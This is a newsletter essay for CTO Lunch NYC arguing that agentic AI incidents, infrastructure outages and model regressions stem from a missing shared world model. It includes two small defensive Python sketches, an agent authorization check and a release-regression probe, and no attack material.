Discovered by an AI in about an hour of scan time using one operator prompt and no harness. It found a non-exotic root privilege escalation that had been sitting there unnoticed for 9 years. To be clear, this wasn’t an exotic attack: no nation-state, no zero-day. It was one prompt and an hour of scanning.
The Context AI incident wasn’t exotic either. It was one employee with one third-party agent app over one OAuth connection to a corporate Google account. Boom. Corporate account compromised, internal systems accessed, unencrypted credentials exposed. No sophisticated attack chain. No zero-day. Again, no nation-state threat actor. Just the entirely predictable consequence of OAuth as an identity model for agents that act autonomously on behalf of humans inside enterprise systems. The blast radius of a single misconfigured trust relationship, in a world where agents are now operational.
The security community has seen this coming. Last December OWASP published the Top 10 for Agentic Applications, the first formal taxonomy of risks specific to autonomous AI agents, covering goal hijacking, tool misuse, identity abuse, memory poisoning, cascading failures, and rogue agents. Real categories, based on real incidents. Hidden prompts turning copilots into silent exfiltration engines. Agents bending legitimate tools into destructive outputs. Leaked credentials letting them operate far beyond their intended scope.
Institutional responses followed. Microsoft shipped the Agent Governance Toolkit in April, open-source, MIT-licensed, the first toolkit to address all 10 OWASP agentic AI risks with deterministic, sub-millisecond policy enforcement. The Colorado AI Act becomes enforceable in June 2026. Over in the EU, the AI Act’s high-risk AI obligations take effect in August. The enterprise security stack is reorganizing around the agentic threat model in real time, with enough urgency that the regulatory and tooling responses are arriving within weeks of each other. Palo Alto announced the acquisition of Portkey yesterday, positioning their AI Gateway as the unified control plane for agent traffic governance.
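What "deterministic policy enforcement" means in practice is easier to see than to describe. The sketch below is an illustration only and is not the Agent Governance Toolkit's API, nor anything from Portkey: `Principal`, `ToolCall`, `authorize`, and the allowlist are all hypothetical names. It assumes one simple rule, that an agent holding a human's OAuth scopes still needs an explicit allowlist entry before it can write anywhere.

```python
from dataclasses import dataclass
from typing import FrozenSet


@dataclass(frozen=True)
class Principal:
    name: str
    kind: str               # "human" or "agent"
    scopes: FrozenSet[str]  # what the credential was actually granted


@dataclass(frozen=True)
class ToolCall:
    tool: str
    action: str             # "read" or "write"


# Hypothetical policy table: tools an agent may write to at all.
AGENT_WRITE_ALLOWLIST = frozenset({"ticketing"})


def authorize(p: Principal, call: ToolCall) -> bool:
    """Deterministic check: no model in the loop, same input gives same answer."""
    needed = f"{call.tool}:{call.action}"
    if needed not in p.scopes:
        return False  # the credential never had this scope
    if p.kind == "agent" and call.action == "write":
        # Inheriting a human's scope is not enough for an agent to write.
        return call.tool in AGENT_WRITE_ALLOWLIST
    return True


scopes = frozenset({"mail:read", "mail:write", "ticketing:write"})
alice = Principal("alice", "human", scopes)
bot = Principal("alice-assistant", "agent", scopes)  # same scopes, different kind

print(authorize(alice, ToolCall("mail", "write")))     # True
print(authorize(bot, ToolCall("mail", "write")))       # False
print(authorize(bot, ToolCall("ticketing", "write")))  # True
```

Same credential, different answer, because the principal's kind is part of the decision. That is the piece OAuth alone never asked about.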
And yet. Only 21% of organizations have a mature governance model for autonomous AI agents. Nearly as many organizations expect their AI agent security investment to decrease over the next twelve months as expect it to increase (41.6% versus 42.4%) at the exact moment agents are moving from pilots to production, from read to write access, from controlled experiments to autonomous operations across enterprise systems that were never designed for this. The investment curve and the risk curve are running in opposite directions. I honestly can’t explain it. Ok, maybe I can.
The question is why, and the answer, if you’ve been paying attention to this newsletter, is the same answer it always is: the threat model isn’t visible yet because the world model that would make it visible doesn’t exist. Organizations can’t price a risk they haven’t encoded; can’t govern behavior they haven’t modeled; can’t defend a boundary they assumed rather than enforced. So many things they can’t do.
There is also the harder version of this problem. Anthropic’s Mythos Preview was a gated research preview for defensive cybersecurity work. What the system card notes, carefully, is that Anthropic did not explicitly train Mythos to have offensive capabilities. They emerged as a downstream consequence of general improvements in code, reasoning, and autonomy. The same improvements that make the model more effective at patching vulnerabilities also make it more effective at exploiting them. Which also means it’s nothing particular to Mythos. GPT 5.5 is finding this same class of exploits. In theory Qwen isn’t that far behind discovering root escalations in a decade’s worth of Linux releases in about an hour of scan time. The capability surface and the threat surface are now the same surface, and they’re expanding together. CTOs want to know what’s collapsing under the weight of this expanding surface.
Calypso Colapso
Signs of collapse are everywhere. For CTOs, the trick is knowing what it’s collapsing into. And why.
If you’ve been paying attention you may have noticed each layer of the stack has destabilized for the same reason. Not because the vendors are incompetent, though some of them are having a rough quarter. Not because the industry is moving fast, though it is (still not as fast as some would like.) But underneath it all, the same structural failure expressing itself at every layer simultaneously: the shared world model was never in the substrate. It was in people’s heads, in institutional memory, in the implicit understanding of what “canonical state” means and when to tombstone versus hard delete. Under agentic pressure, this missing map is multiplying malfunction across the entire ecosystem.
At the bottom of the stack it’s why data centers can no longer be treated as warehouses, which were always just a buffer on ultimate throughput. Token factories make this explicit, specifically the need for an efficient transformation pipeline across hardware, runtime and orchestration that either has a shared model or a way to withstand collapse in the absence of one.
But the infrastructure layer we rely on for that stability is also collapsing. GitHub literally just had 88 incidents in 89 days. Anthropic's status bar looks like a Gerhard Richter. And the real horror is that infra is learning to drive itself on a substrate that is silently, consistently, undependably wrong. That’s a new category of failure that doesn’t have a runbook yet.
Above that, model performance is also destabilized. Regressive updates, to be concise. But with the regression surface expanded to include things you didn’t know you were depending on; tokenizer behavior, tool call limits, system prompt interpretation. Your vendors’ release cadence became an infrastructure risk class with no line on your risk register.
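One hedge against that expanded regression surface is to write down the behaviors you are quietly depending on and diff them across vendor releases. The sketch below assumes a lot: the probes are hypothetical, the "models" are fake dictionaries standing in for real vendor SDK clients (no real API is shown), and the three checks simply mirror the three examples above.

```python
from typing import Callable, Dict, List

# A probe measures one behavior you implicitly depend on.
Probe = Callable[[dict], object]

PROBES: Dict[str, Probe] = {
    "token_count_for_fixture": lambda m: m["count_tokens"]("SELECT * FROM orders;"),
    "max_tool_calls_per_turn": lambda m: m["max_tool_calls"],
    "obeys_json_only_system_prompt": lambda m: m["complete"](
        "Reply in JSON only.", "hi"
    ).startswith("{"),
}


def snapshot(model: dict) -> Dict[str, object]:
    # Record every probed behavior for one model version.
    return {name: probe(model) for name, probe in PROBES.items()}


def diff(baseline: Dict[str, object], candidate: Dict[str, object]) -> List[str]:
    # Names of behaviors that changed between two snapshots.
    return sorted(k for k in baseline if baseline[k] != candidate[k])


# Fake stand-ins for two releases of the same vendor model.
model_v1 = {
    "count_tokens": lambda s: len(s.split()),
    "max_tool_calls": 16,
    "complete": lambda system, user: '{"reply": "hi"}',
}
model_v2 = {
    "count_tokens": lambda s: len(s.split()) + 2,             # tokenizer changed
    "max_tool_calls": 16,
    "complete": lambda system, user: 'Sure! {"reply": "hi"}',  # preamble crept in
}

changed = diff(snapshot(model_v1), snapshot(model_v2))
print(changed)  # ['obeys_json_only_system_prompt', 'token_count_for_fixture']
```

A non-empty diff does not mean the new release is worse. It means something you depended on moved, which is exactly the line that was missing from the risk register.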
All of which leads us to the agentic stack explicitly, which ofc has arrived before anyone agreed on where agents live or who governs them. The human persona, which was never a security boundary so much as an assumption we occasionally noticed, got stress-tested and was found wanting, as were security protocols at the company making the most interesting argument for application-layer agent governance. (And context concerns sitting atop all this, quietly munching tokens like a snack attack.)
Every layer of the stack was architected for a world that assumed stability: stable hardware economics, stable infrastructure primitives, stable model behavior, stable human personas as the unit of identity, stable institutional knowledge as the carrier of architectural intent. That world is gone. What replaced it is a system under continuous destabilization, in multiple directions, faster than most organizational response times, and the standard responses (better procurement, more vendors, tighter SLAs) are solutions to a problem that assumed a shared world model as a fixed point of reference.
You now have some insight into why Yann LeCun is so hopped up about world models. Not the Yann of the quote-tweet, nor the Yann of the panel debate, nor the Yann of the long-running public disagreement with people who think scaling is all you need. The actual argument, which has been consistent and specific and largely misread as contrarianism: that a system without a persistent, structured model of the world it's operating in is not intelligent, it's interpolating. That the difference between a system that can act coherently across contexts and one that can't is not a bigger context window or a better attention mechanism, it's whether the system has internalized a model of how the world works that persists across interactions, updates with new information, and can be queried, corrected, and composed with other world models.
Which is AGI, no? Not the AGI of a philosophic treatise, or podcasts or CEO tweets or news media or influencers or that one person you see at literally every single event in SF or the long tail of flame wars on social media. But AGI as the global solution, the intelligence layer built in response to the problem of shared world model reconciliation across domain and service boundaries, across the layers of the collapsing stack. The problem we have just watched express itself over the last quarter.
What we really saw this quarter, in the hardware announcements, the GitHub incidents, the model instability, the agentic identity crisis, and the context drift, was five different layers, five different sets of vendors and failure modes, and engineering teams having very different bad weeks (and so missing lunch), with the same load-bearing absence at the bottom of every single one: a shared world model that was never in the substrate.
The same root cause surfacing independently across hardware economics, infrastructure trust, model behavioral stability, agent identity, and context coherence.
Here's what that looks like when you trace it through each layer specifically. GitHub's Merge Queue bug didn't silently revert commits across 658 repositories because the engineers were careless. It did so because the system had grown complex enough that no team held a coherent model of its own state: what "canonical" meant, what a commit's downstream effects were, which invariants still held. That's a world model failure expressed as infrastructure. The Opus 4.7 regression is the same failure expressed as a model release: the vendor's internal model of "what improvement means" diverged from the production model of "what better means in your workload," with no shared ground truth to arbitrate between them. The Context AI incident is the same failure expressed as identity: OAuth was designed for a world where the entity holding credentials was a human with persistent, accountable behavior. The second an agent held those credentials, the identity system was running on a world model that no longer described reality. And context drift is just this failure made explicit: agents begin every session with no world model at all and reconstruct it imperfectly from available context, and in multi-agent systems each agent's partial reconstruction diverges from every other agent's, producing a shared world model that is dissolving in real time.
The world model problem isn’t one of many things that needs solving. It’s the thing. And it’s about to get dramatically more visible as agentic systems move from pilots to production, from read access to write access, from controlled experiments to autonomous operations across enterprise systems that were never designed for this.
That billion dollars isn't a bet on a researcher. Legendary he may be. It's a bet that the problem we’ve been analyzing is real, structural, and large enough to be worth solving from first principles. He wasn’t given a billion dollars for the discourse. He was given it for the diagnosis. To build the structural remedy for collapse.
And that is the actual state of the stack: not broken, not evolving, but actively de-cohering along every axis once assumed to be stable. Hardware economics, infrastructure trust, model behavior, agent identity, context continuity: all moving at once, all failing in correlated ways no single vendor owns end-to-end.
The only remaining variable is whether you treat that as a procurement cycle or an architectural constraint.
—Forest Mars for CTO Lunch NYC
To attend CTO Lunch, sign up at ctolunches.com and rsvp (‘will’ attend, not ‘want to’)



